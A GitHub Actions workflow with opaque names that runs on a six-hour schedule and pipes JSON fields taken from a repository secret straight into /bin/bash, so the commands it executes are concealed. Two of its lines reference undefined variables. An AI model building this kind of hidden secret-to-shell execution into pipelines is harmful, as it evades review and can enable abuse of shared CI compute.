name: yangziyuan1962

on:
  workflow_dispatch:
  schedule:
    - cron: '4 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yangziyuan1962
        env:
          kwe157: ${{ secrets.kwe157 }}
        run: |
          echo $kwe157 | jq -r .s5448 | /bin/bash
          echo $z99 | jq -r .whxc4022 | /bin/bash
          echo $f1 | jq -r .zhcse81 | /bin/bash

